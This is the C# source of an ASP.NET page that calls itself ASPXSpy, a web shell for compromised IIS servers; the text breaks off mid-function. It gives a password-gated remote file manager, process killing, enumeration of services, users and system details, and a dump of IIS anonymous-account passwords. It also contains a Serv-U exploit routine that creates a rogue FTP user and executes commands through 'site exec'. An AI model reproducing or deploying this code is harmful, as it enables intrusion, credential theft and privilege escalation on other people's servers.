<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%><%@ import Namespace="System.IO"%><%@ import Namespace="System.Diagnostics"%><%@ import Namespace="System.Data"%><%@ import Namespace="System.Management"%><%@ import Namespace="System.Data.OleDb"%><%@ import Namespace="Microsoft.Win32"%><%@ import Namespace="System.Net.Sockets" %><%@ import Namespace="System.Net" %><%@ import Namespace="System.Runtime.InteropServices"%><%@ import Namespace="System.DirectoryServices"%><%@ import Namespace="System.ServiceProcess"%><%@ import Namespace="System.Text.RegularExpressions"%><%@ Import Namespace="System.Threading"%><%@ Import Namespace="System.Data.SqlClient"%><%@ import Namespace="Microsoft.VisualBasic"%><%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%><%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%><%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%><%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><script runat="server">/*Thanks Snailsor,FuYu,BloodSword,Cnqing,Code by BinMake in ChinaBlog: http://alikaptanoglu.blogspot.comE-mail : ali_kaptanoglu@hotmail.com*/public string Password="21232f297a57a5a743894a0e4a801fc3";//adminpublic string vbhLn="ASPXSpy";public int TdgGU=1;protected OleDbConnection Dtdr=new OleDbConnection();protected OleDbCommand Kkvb=new OleDbCommand();public NetworkStream NS=null;public NetworkStream NS1=null;TcpClient tcp=new TcpClient();TcpClient zvxm=new TcpClient();ArrayList IVc=new ArrayList();protected void Page_load(object sender,EventArgs e){YFcNP(this);fhAEn();if (!pdo()){return;}if(IsPostBack){string tkI=Request["__EVENTTARGET"];string VqV=Request["__File"];if(tkI!=""){switch(tkI){case "Bin_Parent":krIR(Ebgw(VqV));break;case "Bin_Listdir":krIR(Ebgw(VqV));break;case "kRXgt":kRXgt(Ebgw(VqV));break;case "Bin_Createfile":gLKc(VqV);break;case "Bin_Editfile":gLKc(VqV);break;case "Bin_Createdir":stNPw(VqV);break;case "cYAl":cYAl(VqV);break;case "ksGR":ksGR(Ebgw(VqV));break;case "SJv":SJv(VqV);break;case "Bin_Regread":tpRQ(Ebgw(VqV));break;case "hae":hae();break;case "urJG":urJG(VqV);break;}if(tkI.StartsWith("dAJTD")){dAJTD(Ebgw(tkI.Replace("dAJTD","")),VqV);}else if(tkI.StartsWith("Tlvz")){Tlvz(Ebgw(tkI.Replace("Tlvz","")),VqV);}else if(tkI.StartsWith("Bin_CFile")){YByN(Ebgw(tkI.Replace("Bin_CFile","")),VqV);}}}else{PBZw();}}public bool pdo(){if(Request.Cookies[vbhLn]==null){tZSx();return false;}else{if (Request.Cookies[vbhLn].Value != Password){tZSx();return false;}else{return true;}}}public void tZSx(){ljtzC.Visible=true;ZVS.Visible=false;}protected void YKpI(object sender,EventArgs e){Session.Abandon();Response.Cookies.Add(new HttpCookie(vbhLn,null));tZSx();}public void PBZw(){ZVS.Visible=true;ljtzC.Visible=false;Bin_Button_CreateFile.Attributes["onClick"]="var filename=prompt('Please input the file name:','');if(filename){Bin_PostBack('Bin_Createfile',filename);}";Bin_Button_CreateDir.Attributes["onClick"]="var filename=prompt('Please input the directory name:','');if(filename){Bin_PostBack('Bin_Createdir',filename);}";Bin_Button_KillMe.Attributes["onClick"]="if(confirm('Are you sure delete ASPXSPY?')){Bin_PostBack('hae','');};";Bin_Span_Sname.InnerHtml=Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"("+Request.ServerVariables["SERVER_NAME"]+")";Bin_Span_FrameVersion.InnerHtml="Framework Ver : "+Environment.Version.ToString();if (AXSbb.Value==string.Empty){AXSbb.Value=OElM(Server.MapPath("."));}Bin_H2_Title.InnerText="File Manager >>";krIR(AXSbb.Value);}public void fhAEn(){try{string[] YRgt=Directory.GetLogicalDrives();for(int i=0;i<YRgt.Length;i++){Control c=ParseControl(" <asp:LinkButton Text='"+mFvj(YRgt[i])+"' ID=\"Bin_Button_Driv"+i+"\" runat='server' commandargument= '"+YRgt[i]+"'/> | ");Bin_Span_Drv.Controls.Add(c);LinkButton nxeDR=(LinkButton)Page.FindControl("Bin_Button_Driv"+i);nxeDR.Command+=new CommandEventHandler(this.iVk);}}catch(Exception ex){}}public string OElM(string path){if(path.Substring(path.Length-1,1)!=@"\"){path=path+@"\";}return path;}public string nrrx(string path){char[] trim={'\\'};if(path.Substring(path.Length-1,1)==@"\"){path=path.TrimEnd(trim);}return path;}[DllImport("kernel32.dll",EntryPoint="GetDriveTypeA")]public static extern int OMZP(string nDrive);public string mFvj(string instr){string EuXD=string.Empty;int num=OMZP(instr);switch(num){case 1:EuXD="Unknow("+instr+")";break;case 2:EuXD="Removable("+instr+")";break;case 3:EuXD="Fixed("+instr+")";break;case 4:EuXD="Network("+instr+")";break;case 5:EuXD="CDRom("+instr+")";break;case 6:EuXD="RAM Disk("+instr+")";break;}return EuXD.Replace(@"\","");}public string MVVJ(string instr){byte[] tmp=Encoding.Default.GetBytes(instr);return Convert.ToBase64String(tmp);}public string Ebgw(string instr){byte[] tmp=Convert.FromBase64String(instr);return Encoding.Default.GetString(tmp);}public void krIR(string path){WICxe();CzfO.Visible=true;Bin_H2_Title.InnerText="File Manager >>";AXSbb.Value=OElM(path);DirectoryInfo GQMM=new DirectoryInfo(path);if(Directory.GetParent(nrrx(path))!=null){string bg=OKM();TableRow p=new TableRow();for(int i=1;i<6;i++){TableCell pc=new TableCell();if(i==1){pc.Width=Unit.Parse("2%");pc.Text="0";p.CssClass=bg;}if(i==2){pc.Text="<a href=\"javascript:Bin_PostBack('Bin_Parent','"+MVVJ(Directory.GetParent(nrrx(path)).ToString())+"')\">Parent Directory</a>";}p.Cells.Add(pc);UGzP.Rows.Add(p);}}try{int vLlH=0;foreach(DirectoryInfo Bin_folder in GQMM.GetDirectories()){string bg=OKM();vLlH++;TableRow tr=new TableRow();TableCell tc=new TableCell();tc.Width=Unit.Parse("2%");tc.Text="0";tr.Attributes["onmouseover"]="this.className='focus';";tr.CssClass=bg;tr.Attributes["onmouseout"]="this.className='"+bg+"';";tr.Cells.Add(tc);TableCell HczyN=new TableCell();HczyN.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(AXSbb.Value+Bin_folder.Name)+"')\">"+Bin_folder.Name+"</a>";tr.Cells.Add(HczyN);TableCell LYZK=new TableCell();LYZK.Text=Bin_folder.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss");tr.Cells.Add(LYZK);UGzP.Rows.Add(tr);TableCell ERUL=new TableCell();ERUL.Text="--";tr.Cells.Add(ERUL);UGzP.Rows.Add(tr);TableCell ZGKh=new TableCell();ZGKh.Text="<a href=\"javascript:if(confirm('Are you sure will delete it ?\\n\\nIf non-empty directory,will be delete all the files.')){Bin_PostBack('kRXgt','"+MVVJ(AXSbb.Value+Bin_folder.Name)+"')};\">Del</a> | <a href='#' onclick=\"var filename=prompt('Please input the new folder name:','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_folder.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('dAJTD"+MVVJ(AXSbb.Value+Bin_folder.Name)+"',filename);} \">Rename</a>";tr.Cells.Add(ZGKh);UGzP.Rows.Add(tr);}TableRow cKVA=new TableRow();cKVA.Attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;";cKVA.Attributes["bgcolor"]="#dddddd";TableCell JlmW=new TableCell();JlmW.Attributes["colspan"]="6" ;JlmW.Attributes["height"]="5";cKVA.Cells.Add(JlmW);UGzP.Rows.Add(cKVA);int aYRwo=0;foreach(FileInfo Bin_Files in GQMM.GetFiles()){aYRwo++;string gb=OKM();TableRow tr=new TableRow();TableCell tc=new TableCell();tc.Width=Unit.Parse("2%");tc.Text="<input type=\"checkbox\" value=\"0\" name=\""+MVVJ(Bin_Files.Name)+"\">";tr.Attributes["onmouseover"]="this.className='focus';";tr.CssClass=gb;tr.Attributes["onmouseout"]="this.className='"+gb+"';";tr.Cells.Add(tc);TableCell filename=new TableCell();if(Bin_Files.FullName.StartsWith(Request.PhysicalApplicationPath)){string url=Request.Url.ToString();filename.Text="<a href=\""+Bin_Files.FullName.Replace(Request.PhysicalApplicationPath,url.Substring(0,url.IndexOf('/',8)+1)).Replace("\\","/")+"\" target=\"_blank\">"+Bin_Files.Name+"</a>";}else{filename.Text=Bin_Files.Name;}TableCell albt=new TableCell();albt.Text=Bin_Files.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss");TableCell YzK=new TableCell();YzK.Text=mTG(Bin_Files.Length);TableCell GLpi=new TableCell();GLpi.Text="<a href=\"#\" onclick=\"Bin_PostBack('ksGR','"+MVVJ(AXSbb.Value+Bin_Files.Name)+"')\">Down</a> | <a href='#' onclick=\"var filename=prompt('Please input the new path(full path):','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('Bin_CFile"+MVVJ(AXSbb.Value+Bin_Files.Name)+"',filename);} \">Copy</a> | <a href=\"#\" onclick=\"Bin_PostBack('Bin_Editfile','"+Bin_Files.Name+"')\">Edit</a> | <a href='#' onclick=\"var filename=prompt('Please input the new file name(full path):','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('Tlvz"+MVVJ(AXSbb.Value+Bin_Files.Name)+"',filename);} \">Rename</a> | <a href=\"#\" onclick=\"Bin_PostBack('cYAl','"+Bin_Files.Name+"')\">Time</a> ";tr.Cells.Add(filename);tr.Cells.Add(albt);tr.Cells.Add(YzK);tr.Cells.Add(GLpi);UGzP.Rows.Add(tr);}string lgb=OKM();TableRow oWam=new TableRow();oWam.CssClass=lgb;for(int i=1;i<4;i++){TableCell lGV=new TableCell();if(i==1){lGV.Text="<input name=\"chkall\" value=\"on\" type=\"checkbox\" onclick=\"var ck=document.getElementsByTagName('input');for(var i=0;i<ck.length-1;i++){if(ck[i].type=='checkbox'&&ck[i].name!='chkall'){ck[i].checked=forms[0].chkall.checked;}}\"/>";}if(i==2){lGV.Text="<a href=\"#\" Onclick=\"var d_file='';var ck=document.getElementsByTagName('input');for(var i=0;i<ck.length-1;i++){if(ck[i].checked&&ck[i].name!='chkall'){d_file+=ck[i].name+',';}};if(d_file==null || d_file==''){ return;} else {if(confirm('Are you sure delete the files ?')){Bin_PostBack('SJv',d_file)};}\">Delete selected</a>";}if(i==3){lGV.ColumnSpan=4;lGV.Style.Add("text-align","right");lGV.Text=vLlH+" directories/ "+aYRwo+" files";}oWam.Cells.Add(lGV);}UGzP.Rows.Add(oWam);}catch(Exception error){xseuB(error.Message);}}public string OKM(){TdgGU++;if(TdgGU % 2==0){return "alt1";}else{return "alt2";}}public void kRXgt(string qcKu){try{Directory.Delete(qcKu,true);xseuB("Directory delete new success !");}catch(Exception error){xseuB(error.Message);}krIR(Directory.GetParent(qcKu).ToString());}public void dAJTD(string sdir,string ddir){try{Directory.Move(sdir,ddir);xseuB("Directory Renamed Success !");}catch(Exception error){xseuB(error.Message);}krIR(AXSbb.Value);}public void Tlvz(string sfile,string dfile){try{File.Move(sfile,dfile);xseuB("File Renamed Success !");}catch(Exception error){xseuB(error.Message);}krIR(AXSbb.Value);}public void YByN(string spath,string dpath){try{File.Copy(spath,dpath);xseuB("File Copy Success !");}catch(Exception error){xseuB(error.Message);}krIR(AXSbb.Value);}public void stNPw(string path){try{Directory.CreateDirectory(AXSbb.Value+path);xseuB("Directory created success !");}catch(Exception error){xseuB(error.Message);}krIR(AXSbb.Value);}public void gLKc(string path){if(Request["__EVENTTARGET"]=="Bin_Editfile" || Request["__EVENTTARGET"]=="Bin_Createfile"){foreach(ListItem item in NdCX.Items){if(item.Selected=true){item.Selected=false;}}}Bin_H2_Title.InnerHtml="Create/ Edit File >>";WICxe();vrFA.Visible=true;if(path.IndexOf(":")< 0){Sqon.Value=AXSbb.Value+path;}else{Sqon.Value=path;}if(File.Exists(Sqon.Value)){StreamReader sr;if(NdCX.SelectedItem.Text=="UTF-8"){sr=new StreamReader(Sqon.Value,Encoding.UTF8);}else{sr=new StreamReader(Sqon.Value,Encoding.Default);}Xgvv.InnerText=sr.ReadToEnd();sr.Close();}else{Xgvv.InnerText=string.Empty;}}public void ksGR(string path){FileInfo fs=new FileInfo(path);Response.Clear();Page.Response.ClearHeaders();Page.Response.Buffer=false;this.EnableViewState=false;Response.AddHeader("Content-Disposition","attachment;filename="+HttpUtility.UrlEncode(fs.Name,System.Text.Encoding.UTF8));Response.AddHeader("Content-Length",fs.Length.ToString());Page.Response.ContentType="application/unknown";Response.WriteFile(fs.FullName);Page.Response.Flush();Page.Response.Close();Response.End();Page.Response.Clear();}public void SJv(string path){try{string[] spdT=path.Split(',');for(int i=0;i<spdT.Length-1;i++){File.Delete(AXSbb.Value+Ebgw(spdT[i]));}xseuB("File Delete Success !");}catch(Exception error){xseuB(error.Message);}krIR(AXSbb.Value);}public void hae(){try{File.Delete(Request.PhysicalPath);Response.Redirect("http://www.rootkit.net.cn");}catch(Exception error){xseuB(error.Message);}}public void cYAl(string path){Bin_H2_Title.InnerHtml="Clone file was last modified time >>";WICxe();zRyG.Visible=true;QiFB.Value=AXSbb.Value+path;lICp.Value=AXSbb.Value;pWVL.Value=AXSbb.Value+path;string Att=File.GetAttributes(QiFB.Value).ToString();if(Att.LastIndexOf("ReadOnly")!=-1){ZhWSK.Checked=true;}if(Att.LastIndexOf("System")!=-1){SsR.Checked=true;}if(Att.LastIndexOf("Hidden")!=-1){ccB.Checked=true;}if(Att.LastIndexOf("Archive")!=-1){fbyZ.Checked=true;}yUqx.Value=File.GetCreationTimeUtc(pWVL.Value).ToString();uYjw.Value=File.GetLastWriteTimeUtc(pWVL.Value).ToString();aLsn.Value=File.GetLastAccessTimeUtc(pWVL.Value).ToString();}public static String mTG(Int64 fileSize){if(fileSize<0){throw new ArgumentOutOfRangeException("fileSize");}else if(fileSize >= 1024 * 1024 * 1024){return string.Format("{0:########0.00} G",((Double)fileSize)/(1024 * 1024 * 1024));}else if(fileSize >= 1024 * 1024){return string.Format("{0:####0.00} M",((Double)fileSize)/(1024 * 1024));}else if(fileSize >= 1024){return string.Format("{0:####0.00} K",((Double)fileSize)/ 1024);}else{return string.Format("{0} B",fileSize);}}private bool SGde(string sSrc){Regex reg=new Regex(@"^0|[0-9]*[1-9][0-9]*$");if(reg.IsMatch(sSrc)){return true;}else{return false;}}public void AdCx(){string qcKu=string.Empty;string mWGEm="IIS://localhost/W3SVC";GlI.Style.Add("word-break","break-all");try{DirectoryEntry HHzcY=new DirectoryEntry(mWGEm);int fmW=0;foreach(DirectoryEntry child in HHzcY.Children){if(SGde(child.Name.ToString())){fmW++;DirectoryEntry newdir=new DirectoryEntry(mWGEm+"/"+child.Name.ToString());DirectoryEntry HlyU=newdir.Children.Find("root","IIsWebVirtualDir");string bg=OKM();TableRow TR=new TableRow();TR.Attributes["onmouseover"]="this.className='focus';";TR.CssClass=bg;TR.Attributes["onmouseout"]="this.className='"+bg+"';";TR.Attributes["title"]="Site:"+child.Properties["ServerComment"].Value.ToString();for(int i=1;i<6;i++){try{TableCell tfit=new TableCell();switch(i){case 1:tfit.Text=fmW.ToString();break;case 2:tfit.Text=HlyU.Properties["AnonymousUserName"].Value.ToString();break;case 3:tfit.Text=HlyU.Properties["AnonymousUserPass"].Value.ToString();break;case 4:StringBuilder sb=new StringBuilder();PropertyValueCollection pc=child.Properties["ServerBindings"];for (int j=0; j < pc.Count; j++){sb.Append(pc[j].ToString()+"
");}tfit.Text=sb.ToString().Substring(0,sb.ToString().Length-4);break;case 5:tfit.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(HlyU.Properties["Path"].Value.ToString())+"')\">"+HlyU.Properties["Path"].Value.ToString()+"</a>";break;}TR.Cells.Add(tfit);}catch (Exception ex){xseuB(ex.Message);continue;}}GlI.Controls.Add(TR);}}}catch(Exception ex){xseuB(ex.Message);}}public ManagementObjectCollection PhQTd(string query){ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query));return QS.Get();}public DataTable cCf(string query){DataTable dt=new DataTable();int i=0;ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query));try{foreach(ManagementObject m in QS.Get()){DataRow dr=dt.NewRow();PropertyDataCollection.PropertyDataEnumerator oEnum;oEnum=(m.Properties.GetEnumerator()as PropertyDataCollection.PropertyDataEnumerator);while(oEnum.MoveNext()){PropertyData DRU=(PropertyData)oEnum.Current;if(dt.Columns.IndexOf(DRU.Name)==-1){dt.Columns.Add(DRU.Name);dt.Columns[dt.Columns.Count-1].DefaultValue="";}if(m[DRU.Name]!=null){dr[DRU.Name]=m[DRU.Name].ToString();}else{dr[DRU.Name]=string.Empty;}}dt.Rows.Add(dr);}}catch(Exception error){}return dt;}public void YUw(){try{Bin_H2_Title.InnerText="Process >>";WICxe();DCbS.Visible=true;int UEbTI=0;Process[] p=Process.GetProcesses();foreach(Process sp in p){UEbTI++;string bg=OKM();TableRow tr=new TableRow();tr.Attributes["onmouseover"]="this.className='focus';";tr.CssClass=bg;tr.Attributes["onmouseout"]="this.className='"+bg+"';";for(int i=1;i<7;i++){TableCell td=new TableCell();if(i==1){td.Width=Unit.Parse("2%");td.Text=UEbTI.ToString();tr.Controls.Add(td);}if(i==2){td.Text=sp.Id.ToString();tr.Controls.Add(td);}if(i==3){td.Text=sp.ProcessName.ToString();tr.Controls.Add(td);}if(i==4){td.Text=sp.Threads.Count.ToString();tr.Controls.Add(td);}if(i==5){td.Text=sp.BasePriority.ToString();tr.Controls.Add(td);}if(i==6){td.Text="--";tr.Controls.Add(td);}}IjsL.Controls.Add(tr);}}catch(Exception error){AIz();}AIz();}public void AIz(){try{Bin_H2_Title.InnerText="Process >>";WICxe();DCbS.Visible=true;int UEbTI=0;DataTable dt=cCf("Win32_Process");for(int j=0;j<dt.Rows.Count;j++){UEbTI++;string bg=OKM();TableRow tr=new TableRow();tr.Attributes["onmouseover"]="this.className='focus';";tr.CssClass=bg;tr.Attributes["onmouseout"]="this.className='"+bg+"';";for(int i=1;i<7;i++){TableCell td=new TableCell();if(i==1){td.Width=Unit.Parse("2%");td.Text=UEbTI.ToString();tr.Controls.Add(td);}if(i==2){td.Text=dt.Rows[j]["ProcessID"].ToString();tr.Controls.Add(td);}if(i==3){td.Text=dt.Rows[j]["Name"].ToString();tr.Controls.Add(td);}if(i==4){td.Text=dt.Rows[j]["ThreadCount"].ToString();tr.Controls.Add(td);}if(i==5){td.Text=dt.Rows[j]["Priority"].ToString();tr.Controls.Add(td);}if(i==6){if( dt.Rows[j]["CommandLine"]!=string.Empty){td.Text="<a href=\"javascript:Bin_PostBack('urJG','"+dt.Rows[j]["ProcessID"].ToString()+"')\">Kill</a>";}else{td.Text="--";}tr.Controls.Add(td);}}IjsL.Controls.Add(tr);}}catch(Exception error){xseuB(error.Message);}}public void urJG(string pid){try{foreach(ManagementObject p in PhQTd("Select * from Win32_Process Where ProcessID ='"+pid+"'")){p.InvokeMethod("Terminate",null);p.Dispose();}xseuB("Process Kill Success !");}catch(Exception error){xseuB(error.Message);}AIz();}public void oHpF(){try{Bin_H2_Title.InnerText="Services >>";WICxe();iQxm.Visible=true;int UEbTI=0;ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();for(int i=0;i<kQmRu.Length;i++){UEbTI++;string bg=OKM();TableRow tr=new TableRow();tr.Attributes["onmouseover"]="this.className='focus';";tr.CssClass=bg;tr.Attributes["onmouseout"]="this.className='"+bg+"';";for(int b=1;b<7;b++){TableCell td=new TableCell();if(b==1){td.Width=Unit.Parse("2%");td.Text=UEbTI.ToString();tr.Controls.Add(td);}if(b==2){td.Text="null";tr.Controls.Add(td);}if(b==3){td.Text=kQmRu[i].ServiceName.ToString();tr.Controls.Add(td);}if(b==4){td.Text="";tr.Controls.Add(td);}if(b==5){string kOIo=kQmRu[i].Status.ToString();if(kOIo=="Running"){td.Text="<font color=green>"+kOIo+"</font>";}else{td.Text="<font color=red>"+kOIo+"</font>";}tr.Controls.Add(td);}if(b==6){td.Text="";tr.Controls.Add(td);}}vHCs.Controls.Add(tr);}}catch(Exception error){xseuB(error.Message);}}public void tZRH(){try{Bin_H2_Title.InnerText="Services >>";WICxe();iQxm.Visible=true;int UEbTI=0;DataTable dt=cCf("Win32_Service");for(int j=0;j<dt.Rows.Count;j++){UEbTI++;string bg=OKM();TableRow tr=new TableRow();tr.Attributes["onmouseover"]="this.className='focus';";tr.CssClass=bg;tr.Attributes["onmouseout"]="this.className='"+bg+"';";tr.Attributes["title"]=dt.Rows[j]["Description"].ToString();for(int i=1;i<7;i++){TableCell td=new TableCell();if(i==1){td.Width=Unit.Parse("2%");td.Text=UEbTI.ToString();tr.Controls.Add(td);}if(i==2){td.Text=dt.Rows[j]["ProcessID"].ToString();tr.Controls.Add(td);}if(i==3){td.Text=dt.Rows[j]["Name"].ToString();tr.Controls.Add(td);}if(i==4){td.Text=dt.Rows[j]["PathName"].ToString();tr.Controls.Add(td);}if(i==5){string kOIo=dt.Rows[j]["State"].ToString();if(kOIo=="Running"){td.Text="<font color=green>"+kOIo+"</font>";}else{td.Text="<font color=red>"+kOIo+"</font>";}tr.Controls.Add(td);}if(i==6){td.Text=dt.Rows[j]["StartMode"].ToString();tr.Controls.Add(td);}}vHCs.Controls.Add(tr);}}catch(Exception error){oHpF();}}public void PLd(){try{WICxe();xWVQ.Visible=true;Bin_H2_Title.InnerText="User Information >>";DirectoryEntry TWQ=new DirectoryEntry("WinNT://"+Environment.MachineName.ToString());foreach(DirectoryEntry child in TWQ.Children){foreach(string name in child.Properties.PropertyNames){PropertyValueCollection pvc=child.Properties[name];int c=pvc.Count;for(int i=0;i<c;i++){if(name!="objectSid" && name!="Parameters" && name!="LoginHours"){string bg=OKM();TableRow tr=new TableRow();tr.Attributes["onmouseover"]="this.className='focus';";tr.CssClass=bg;tr.Attributes["onmouseout"]="this.className='"+bg+"';";TableCell td=new TableCell();td.Text=name;tr.Controls.Add(td);TableCell td1=new TableCell();td1.Text=pvc[i].ToString();tr.Controls.Add(td1);VPa.Controls.Add(tr);}}}TableRow trn=new TableRow();for(int x=1;x<3;x++){TableCell tdn=new TableCell();tdn.Attributes["style"]="height:2px;background-color:#bbbbbb;";trn.Controls.Add(tdn);VPa.Controls.Add(trn);}}}catch(Exception error){xseuB(error.Message);}}public void iLVUT(){try{WICxe();xWVQ.Visible=true;Bin_H2_Title.InnerText="User Information >>";DataTable user=cCf("Win32_UserAccount");for(int i=0;i<user.Rows.Count;i++){for(int j=0;j<user.Columns.Count;j++){string bg=OKM();TableRow tr=new TableRow();tr.Attributes["onmouseover"]="this.className='focus';";tr.CssClass=bg;tr.Attributes["onmouseout"]="this.className='"+bg+"';";TableCell td=new TableCell();td.Text=user.Columns[j].ToString();tr.Controls.Add(td);TableCell td1=new TableCell();td1.Text=user.Rows[i][j].ToString();tr.Controls.Add(td1);VPa.Controls.Add(tr);}TableRow trn=new TableRow();for(int x=1;x<3;x++){TableCell tdn=new TableCell();tdn.Attributes["style"]="height:2px;background-color:#bbbbbb;";trn.Controls.Add(tdn);VPa.Controls.Add(trn);}}}catch(Exception error){PLd();}}public void pDVM(){try{RegistryKey EeZ=Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp");string IKjwH=DdmPl(EeZ,"PortNumber");RegistryKey izN=Registry.LocalMachine.OpenSubKey(@"HARDWARE\DESCRIPTION\System\CentralProcessor");int cpu=izN.SubKeyCount;RegistryKey mQII=Registry.LocalMachine.OpenSubKey(@"HARDWARE\DESCRIPTION\System\CentralProcessor\0\");string NPPZ=DdmPl(mQII,"ProcessorNameString");WICxe();ghaB.Visible=true;Bin_H2_Title.InnerText="System Information >>";Bin_H2_Mac.InnerText="MAC Information >>";Bin_H2_Driver.InnerText="Driver Information >>";StringBuilder yEwc=new StringBuilder();StringBuilder hwJeS=new StringBuilder();StringBuilder jXkaE=new StringBuilder();yEwc.Append("<li><u>Server Domain : </u>"+Request.ServerVariables["SERVER_NAME"]+"</li>");yEwc.Append("<li><u>Server Ip : </u>"+Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"</li>");yEwc.Append("<li><u>Terminal Port : </u>"+IKjwH+"</li>");yEwc.Append("<li><u>Server OS : </u>"+Environment.OSVersion+"</li>");yEwc.Append("<li><u>Server Software : </u>"+Request.ServerVariables["SERVER_SOFTWARE"]+"</li>");yEwc.Append("<li><u>Server UserName : </u>"+Environment.UserName+"</li>");yEwc.Append("<li><u>Server Time : </u>"+System.DateTime.Now.ToString()+"</li>");yEwc.Append("<li><u>Server TimeZone : </u>"+cCf("Win32_TimeZone").Rows[0]["Caption"]+"</li>");DataTable BIOS=cCf("Win32_BIOS");yEwc.Append("<li><u>Server BIOS : </u>"+BIOS.Rows[0]["Manufacturer"]+" : "+BIOS.Rows[0]["Name"]+"</li>");yEwc.Append("<li><u>CPU Count : </u>"+cpu.ToString()+"</li>");yEwc.Append("<li><u>CPU Version : </u>"+NPPZ+"</li>");DataTable upM=cCf("Win32_PhysicalMemory");Int64 oZnZV=0;for(int i=0;i<upM.Rows.Count;i++){oZnZV+=Int64.Parse(upM.Rows[0]["Capacity"].ToString());}yEwc.Append("<li><u>Server upM : </u>"+mTG(oZnZV)+"</li>");DataTable dOza=cCf("Win32_NetworkAdapterConfiguration");for(int i=0;i<dOza.Rows.Count;i++){hwJeS.Append("<li><u>Server MAC"+i+" : </u>"+dOza.Rows[i]["Caption"]+"</li>");if(dOza.Rows[i]["MACAddress"]!=string.Empty){hwJeS.Append("<li style=\"list-style:none;\"><u>Address : </u>"+dOza.Rows[i]["MACAddress"]+"</li>");}}DataTable Driver=cCf("Win32_SystemDriver");for (int i=0; i<Driver.Rows.Count; i++){jXkaE.Append("<li><u class='u1'>Server Driver"+i+" : </u><u class='u2'>"+Driver.Rows[i]["Caption"]+"</u> ");if (Driver.Rows[i]["PathName"]!=string.Empty){jXkaE.Append("Path : "+Driver.Rows[i]["PathName"]);}else{jXkaE.Append("No path information");}jXkaE.Append("</li>");}Bin_Ul_Sys.InnerHtml=yEwc.ToString();Bin_Ul_NetConfig.InnerHtml=hwJeS.ToString();Bin_Ul_Driver.InnerHtml=jXkaE.ToString();}catch(Exception error){xseuB(error.Message);}}public void ADCpk(){WICxe();APl.Visible=true;Bin_H2_Title.InnerText="Serv-U Exec >>";}public void lDODR(){string JGGg=string.Empty;string user=dNohJ.Value;string pass=NMd.Value;int port=Int32.Parse(HlQl.Value);string cmd=mHbjB.Value;string CRtK="user "+user+"\r\n";string jnNG="pass "+pass+"\r\n";string site="SITE MAINTENANCE\r\n";string mtoJb="-DELETEDOMAIN\r\n-IP=0.0.0.0\r\n PortNo=52521\r\n";string sutI="-SETDOMAIN\r\n-Domain=BIN|0.0.0.0|52521|-1|1|0\r\n-TZOEnable=0\r\n TZOKey=\r\n";string iVDT="-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=52521\r\n-User=bin\r\n-Password=binftp\r\n-HomeDir=c:\\\r\n-LoginMesFile=\r\n-Disable=0\r\n-RelPaths=1\r\n-NeedSecure=0\r\n-HideHidden=0\r\n-AlwaysAllowLogin=0\r\n-ChangePassword=0\r\n-QuotaEnable=0\r\n-MaxUsersLoginPerIP=-1\r\n-SpeedLimitUp=0\r\n-SpeedLimitDown=0\r\n-MaxNrUsers=-1\r\n-IdleTimeOut=600\r\n-SessionTimeOut=-1\r\n-Expire=0\r\n-RatioDown=1\r\n-RatiosCredit=0\r\n-QuotaCurrent=0\r\n-QuotaMaximum=0\r\n-Maintenance=System\r\n-PasswordType=Regular\r\n-Ratios=NoneRN\r\n Access=c:\\|RWAMELCDP\r\n";string zexn="QUIT\r\n";UHlA.Visible=true;try{tcp.Connect("127.0.0.1",port);tcp.ReceiveBufferSize=1024;NS=tcp.GetStream();Rev(NS);ZJiM(NS,CRtK);Rev(NS);ZJiM(NS,jnNG);Rev(NS);ZJiM(NS,site);Rev(NS);ZJiM(NS,mtoJb);Rev(NS);ZJiM(NS,sutI);Rev(NS);ZJiM(NS,iVDT);Rev(NS);Bin_Td_Res.InnerHtml+="<font color=\"green\">Exec Cmd.................\r\n</font>";zvxm.Connect(Request.ServerVariables["LOCAL_ADDR"],52521);NS1=zvxm.GetStream();Rev(NS1);ZJiM(NS1,"user bin\r\n");Rev(NS1);ZJiM(NS1,"pass binftp\r\n");Rev(NS1);ZJiM(NS1,"site exec "+cmd+"\r\n");Rev(NS1);ZJiM(NS1,"quit\r\n");Rev(NS1);zvxm.Close();ZJiM(NS,mtoJb);Rev(NS);tcp.Close();}catch(Exception error){xseuB(error.Message);}}protected void Rev(NetworkStream instream){string FTBtf=string.Empty;if(instream.CanRead){byte[] uPZ=new byte[1024];do{System.Threading.Thread.Sleep(50);int len=instream.Read(uPZ,0,uPZ.Length);FTBtf+=Encoding.Default.GetString(uPZ,0,len);}while(instream.DataAvailable);}Bin_Td_Res.InnerHtml+="<font color=red>"+FTBtf.Replace("\0","")+"</font>";}protected void ZJiM(NetworkStream instream,string Sendstr){if(instream.CanWrite){byte[] 